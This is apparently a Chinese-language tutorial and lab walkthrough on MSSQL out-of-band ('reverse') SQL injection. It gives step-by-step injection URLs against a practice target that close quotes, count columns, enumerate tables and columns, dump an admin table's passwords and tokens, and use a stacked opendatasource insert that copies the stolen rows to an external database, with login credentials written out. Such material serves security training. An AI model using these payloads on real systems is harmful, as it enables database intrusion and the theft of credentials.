5-4 MSSQL注入 — 反弹注入
一、MSSQL反弹注入使用场景
明明是SQL的注射点却无法进行注射注射工具猜解的速度异常缓慢,
错误提示信息关闭,无法返回注射结果等,这些都是在注射攻击中常常遇到的问题。为了解决以上这些疑难杂症,比较好的解决方法就是使用反弹注射技术,而反弹注射技术则需要依靠 opendatasource函数支持
二、快速搭建一个MSSQL环境(骚姿势)
香港云http://www.webweb.com/
免费在线数据库https://my.gearhost.com/CloudSite
数据库操作http://mssqlus.webweb.com/
三、MSSQL反弹注入语句解析
insert into
插入语句
opendatasource(\'sqloledb\',\'server=SQL5009.webweb.com,1433;uid=DB_14A5E44_zkaq_admin;pwd=zkaqzkaq;database=DB_14A5E44_zkaq\').DB_14A5E44_zkaq.dbo.temp
服务器.库.表 opendatasource(\'sqloledb\',\'\').库.dbo.表
select*from admin --+
admin里的所有数据
四、MSSQL反弹注入靶场分析
1尝试
http://59.63.200.79:8015/?id=1 and 1=1
从报错可以看出需要闭合单引号,后面注释
2.判断注入点
http://59.63.200.79:8015/?id=1\' and 1=1--+ 页面正常
http://59.63.200.79:8015/?id=1\' and 1=2--+ 页面异常
说明存在注入点
3.判断字段数
http://59.63.200.79:8015/?id=1\' order by 3--+页面正常
http://59.63.200.79:8015/?id=1\' order by 4--+页面异常
说明有3个字段
4.看回显点
http://59.63.200.79:8015/?id=1\' union all select 4,\'a\',\'b\'--+
猜输出点要使用NULL去填充
注释只有 --+ (不要想着#)
可以查看回显点
5.查询表
查看用户创建的表
select*from sysobjects where xtype=\'U\';
http://59.63.200.79:8015/?id=1\' union all select id, name ,null from sysobjects where xtype=\'U\'--+
6.查询admin的字段
查看abc表的字段
select*from syscolumns where id=885578193;
http://59.63.200.79:8015/?id=1\' union all select null,name,null from syscolumns where id=1977058079 --+
7.查询admin的数据
http://59.63.200.79:8015/?id=1\' union all select id,passwd,token from admin --+
8.其他反弹注入
http://59.63.200.79:8015/?id=1\';select*from syscolumns where id=1waitfor delay \'0:0:5\'--+
http://59.63.200.79:8015/?id=1\';insert into opendatasource(\'sqloledb\',\'server=den1.mssql7.gear.host,1433;uid=xcsxchen;pwd=Bu18PX8IY5-?;database=xcsxchen\').xcsxchen.dbo.temp select * from admin --+
- 点赞
- 收藏
- 关注作者
评论(0)